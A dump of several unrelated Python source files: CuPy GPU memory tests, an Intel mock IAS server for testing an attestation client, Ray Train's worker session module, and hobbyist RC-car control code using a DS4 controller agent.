arr = cupy.arange(128, dtype=cupy.int64)
self.assertEqual(0, self.pool.used_bytes() - used_bytes)
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
|
mock_ias_server.py | # Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""
Mock IAS server for testing IAS client
"""
import http.server
import threading
import time
import queue
def create(endpoint):
mis = MockIasServer(endpoint)
handlers = {
"up": MockIasStateUp,
"error": MockIasStateError,
"slow": MockIasStateSlow,
"down": MockIasStateDown,
}
for state, handler in handlers.items():
mis.add_state(state, handler)
return mis
class TestHTTPServer(http.server.HTTPServer):
def __init__(self, server_address, RequestHandlerClass):
super().__init__(server_address, RequestHandlerClass)
self.requests = queue.Queue()
class MockIasServer:
"""
Use the State pattern to mock different statuses of the IAS server for
testing.
"""
def __init__(self, endpoint):
if endpoint[:len("http://")] != "http://":
raise ValueError("Invalid endpoint: " + endpoint)
host, port = endpoint[len("http://"):].split(":")
self._address = (host, int(port))
self._handlers = {}
self._server = None
self._thread = None
self._requests = []
def start(self, state):
handler = self._handlers[state]
self._server = TestHTTPServer(self._address, handler)
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.start()
def stop(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def restart(self, state):
self.stop()
self.start(state)
def add_state(self, state, handler):
self._handlers[state] = handler
def get_received(self):
return self._server.requests.get()
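# A minimal usage sketch for the mock server (the endpoint below is an
# arbitrary example value):
#
# mis = create("http://localhost:8008")
# mis.start("up")                 # serve canned 200 responses
# ...point the IAS client at the endpoint and make a request...
# received = mis.get_received()   # dict with "path", "command", "headers"
# mis.restart("error")            # subsequent requests now get a 503
# mis.stop()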
class MockIasStateUp(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
self.server.requests.put({
"path": self.path,
"command": self.command,
"headers": self.headers,
})
self.send_response(200)
self.end_headers()
self.request.sendall(b"thisisasignaturelist")
# pylint: disable=invalid-name
def do_POST(self):
self.server.requests.put({
"path": self.path,
"command": self.command,
"headers": self.headers,
"data": self.rfile.read(int(self.headers.get("content-length"))),
})
self.send_response(200)
self.send_header("x-iasreport-signature", "signature")
self.end_headers()
self.request.sendall(b'{"thisisa":"verification_report"}')
class MockIasStateError(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
self.send_error(503, message="FUBAR")
# pylint: disable=invalid-name
def do_POST(self):
self.send_error(503, message="FUBAR")
class MockIasStateSlow(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
time.sleep(1)
# pylint: disable=invalid-name
def do_POST(self):
time.sleep(1)
class MockIasStateDown(http.server.BaseHTTPRequestHandler):
# pylint: disable=invalid-name
def do_GET(self):
pass
# pylint: disable=invalid-name
def do_POST(self):
pass
|
session.py | import os
import platform
import queue
import threading
import time
from datetime import datetime
from dataclasses import dataclass
from enum import Enum, auto
from typing import Callable
from typing import Optional, Dict, Type, Union
import ray
from ray.data import Dataset, DatasetPipeline
from ray.train._internal.accelerator import Accelerator
from ray.train.constants import (
DETAILED_AUTOFILLED_KEYS,
TIME_THIS_ITER_S,
PID,
TIMESTAMP,
TIME_TOTAL_S,
NODE_IP,
TRAINING_ITERATION,
HOSTNAME,
DATE,
RESULT_FETCH_TIMEOUT,
)
from ray.train._internal.utils import PropagatingThread
from ray.train.error import SessionMisuseError
class TrainingResultType(Enum):
REPORT = auto()
CHECKPOINT = auto()
@dataclass
class TrainingResult:
type: TrainingResultType
data: Dict
class Session:
"""Holds information for training on each worker."""
def __init__(
self,
training_func: Callable,
world_rank: int,
local_rank: int,
world_size: int,
dataset_shard: Optional[Union[Dataset, DatasetPipeline]] = None,
checkpoint: Optional[Dict] = None,
encode_data_fn: Optional[Callable] = None,
detailed_autofilled_metrics: bool = False,
):
self.dataset_shard = dataset_shard
# The Thread object that is running the training function.
self.training_thread = PropagatingThread(target=training_func, daemon=True)
self.world_rank = world_rank
self.local_rank = local_rank
self.world_size = world_size
self.loaded_checkpoint = checkpoint
# Function to encode checkpoint dict before sending to the driver.
if not encode_data_fn:
def noop(x):
return x
encode_data_fn = noop
self._encode_data_fn = encode_data_fn
# This lock is used to control the execution of the training thread.
self.continue_lock = threading.Semaphore(0)
# Queue for sending results across threads.
self.result_queue = queue.Queue(1)
# Autofilled metrics attributes.
self.detailed_autofilled_metrics = detailed_autofilled_metrics
self.last_report_time = time.time()
self.iteration = 0
self.time_total = 0.0
self.local_ip = self.get_current_ip()
self.ignore_report = False
self.training_started = False
self.accelerator = None
def get_current_ip(self):
self.local_ip = ray.util.get_node_ip_address()
return self.local_ip
def start(self):
"""Starts the training thread."""
self.training_started = True
self.training_thread.start()
def pause_reporting(self):
"""Ignore all future ``train.report()`` calls."""
self.ignore_report = True
def finish(self):
"""Finishes the training thread.
Either returns the output from training or raises any Exception from
training.
"""
# Wait for training to finish.
# This will raise any errors that occur during training, including
# SystemError
func_output = self.training_thread.join()
# If training finished successfully, then return results.
return func_output
def get_next(self) -> Optional[TrainingResult]:
"""Gets the next ``TrainingResult`` from the result queue.
If the result queue is empty, then this function returns ``None``.
"""
if not self.training_started:
raise RuntimeError("Please call start before calling get_next.")
result = None
# While training is still ongoing, attempt to get the result.
while result is None and self.training_thread.is_alive():
try:
result = self.result_queue.get(block=True, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# If no result was found, then the runner must no longer be alive.
if result is None:
# Try one last time to fetch results in case results were
# reported in between the time of the last check and the
# termination of the thread runner.
try:
result = self.result_queue.get(
block=False, timeout=RESULT_FETCH_TIMEOUT
)
except queue.Empty:
pass
# Release the lock to trigger training to continue.
self.continue_lock.release()
# Return None if there are no more results to fetch.
return result
def _auto_fill_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_time = time.time()
current_datetime = datetime.now()
if TIME_THIS_ITER_S in result:
time_this_iter = result[TIME_THIS_ITER_S]
else:
time_this_iter = current_time - self.last_report_time
self.iteration += 1
self.time_total += time_this_iter
self.last_report_time = current_time
auto_filled_metrics = {
DATE: current_datetime.strftime("%Y-%m-%d_%H-%M-%S"),
TIMESTAMP: int(time.mktime(current_datetime.timetuple())),
TIME_THIS_ITER_S: time_this_iter,
TIME_TOTAL_S: self.time_total,
PID: os.getpid(),
HOSTNAME: platform.node(),
NODE_IP: self.local_ip,
TRAINING_ITERATION: self.iteration,
}
if not self.detailed_autofilled_metrics:
auto_filled_metrics = {
k: v
for k, v in auto_filled_metrics.items()
if k not in DETAILED_AUTOFILLED_KEYS
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def report(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread."""
if self.ignore_report:
return
kwargs = self._encode_data_fn(self._auto_fill_metrics(kwargs))
result = TrainingResult(TrainingResultType.REPORT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until main thread
# triggers resume.
self.continue_lock.acquire()
def _auto_fill_checkpoint_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_datetime = datetime.now()
auto_filled_metrics = {
TIMESTAMP: int(time.mktime(current_datetime.timetuple()))
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def checkpoint(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread.
Also stores the checkpoint in ``self.loaded_checkpoint``.
"""
# Update session checkpoint to latest checkpoint.
self.loaded_checkpoint = kwargs
# Only store checkpoints on worker with rank 0.
if self.world_rank != 0:
kwargs = {}
else:
kwargs = self._encode_data_fn(self._auto_fill_checkpoint_metrics(kwargs))
result = TrainingResult(TrainingResultType.CHECKPOINT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until
# checkpoint has been processed.
self.continue_lock.acquire()
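# A minimal sketch of the report handshake from the driver's side (the
# training function and metric below are hypothetical). ``report`` blocks on
# ``continue_lock`` until the driver's ``get_next`` releases it, so results
# are consumed one at a time:
#
# def train_func():
#     get_session().report(loss=0.1)  # blocks until the driver fetches it
#
# init_session(training_func=train_func, world_rank=0, local_rank=0,
#              world_size=1)
# session = get_session()
# session.start()
# result = session.get_next()  # TrainingResult(type=REPORT, data={...})
# output = session.finish()
# shutdown_session()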
_session = None
def init_session(*args, **kwargs) -> None:
global _session
if _session:
raise ValueError(
"A Train session is already in use. Do not call "
"`init_session()` manually."
)
_session = Session(*args, **kwargs)
def get_session() -> Optional[Session]:
global _session
return _session
def shutdown_session():
"""Shuts down the initialized session."""
global _session
_session = None
def _raise_accelerator_session_misuse():
"""Raises a SessionMisuseError because a utility function was used improperly."""
raise SessionMisuseError(
"prepare/accelerate utility functions should be called inside a training "
"function executed by `Trainer.run`"
)
def get_accelerator(default_accelerator_cls: Type[Accelerator]) -> Accelerator:
"""The accelerator for this training session.
If an accelerator has not been set, then this method will construct an
accelerator using the provided accelerator class.
Raises:
SessionMisuseError: if the session is uninitialized.
"""
session = get_session()
if session is None:
_raise_accelerator_session_misuse()
if session.accelerator is None:
session.accelerator = default_accelerator_cls()
return session.accelerator
def set_accelerator(accelerator: Accelerator) -> None:
"""Sets the accelerator for this training session.
Args:
accelerator: The accelerator to use for training.
Raises:
SessionMisuseError: if the session is uninitialized.
RuntimeError: if the accelerator has already been set.
"""
session = get_session()
if session is None:
_raise_accelerator_session_misuse()
if session.accelerator is not None:
raise RuntimeError("Cannot change accelerator once set.")
session.accelerator = accelerator
|
rc_software.py | from multiprocessing import Process, Queue
from json import dumps, loads
from threading import Thread
from controller import Controller
from lan_agent import LAN_Agent
from bluetooth_agent import BluetoothAgent
from ds4_agent import DS4Agent
from agent_base import AgentBase
from hashlib import sha256
from utils.constants import SUCCESS, AUTHENTICATION_FAILURE, AGENT_CONNECTED
from sys import argv
from time import sleep
class RC_Car:
"""
The entrypoint of the software for the RC car created like this: TODO: link
By default it will listen on an available port in the range 8000-60000
:examples:
>>> car = RC_Car()
>>> car.run()
"""
def __init__(self):
"""
Creates the instance of the RC_Car class.
* Starts listening on a free port in the range 8000-60000,
* If a connection request is received, it establishes the connection with the client.
* Creates the instance of the controller class
:Assumptions:
* Only one instance of the class is created
"""
self.agent: AgentBase = None
self.agent_queue: "Queue[AgentBase]" = Queue()
self.poll_processes = dict()
password = "69420" # TODO: get password from file
self.password = sha256(password.encode()).digest()
# self.poll_processes[str(LAN_Agent)] = Process(target=LAN_Agent.poll, args=(self.agent_queue,))
self.poll_processes[str(DS4Agent)] = Process(target=DS4Agent.poll, args=(self.agent_queue,))
# self.poll_processes[str(LAN_Agent)].start()
self.poll_processes[str(DS4Agent)].start()
while not self.agent:
print('before get')
candidate_agent = self.agent_queue.get()
print('after get')
if candidate_agent.authenticate(self.password):
self.agent = candidate_agent
self.controller = Controller()
self.is_connection_alive = True
for process in self.poll_processes.values():
process.terminate()
else:
candidate_agent.close_connection()
self.poll_processes[str(candidate_agent)] = Process(target=type(candidate_agent).poll, args=(self.agent_queue,))
self.poll_processes[str(candidate_agent)].start()
def run(self) -> None:
"""
* Starts the thread which sends updates on the state of the controller
* Starts the method which is responsible for receiving the commands from the client.
Note: It blocks until the client ends the connection.
:return: None
"""
update_thread = Thread(target=self.send_updates)
update_thread.start()
self.receive_commands()
update_thread.join()
def receive_commands(self) -> None:
"""
Listens on the receiving socket in an infinite loop.
:Assumptions: None
:return: None
"""
while True:
data = self.agent.receive()
if not data:
self.is_connection_alive = False
break
else:
self.controller.set_values(loads(data))
def send_updates(self) -> None:
"""
Constantly update the client about the state of the controller
:Assumptions: None
:return: None
"""
while self.is_connection_alive:
message = dumps(self.controller.get_values()) + '\n'
self.agent.send(message)
sleep(0.05) # distance sensor
if __name__ == '__main__':
if len(argv) > 1 and argv[1] == '--debug':
b = DS4Agent()
else:
RC_Car().run()
|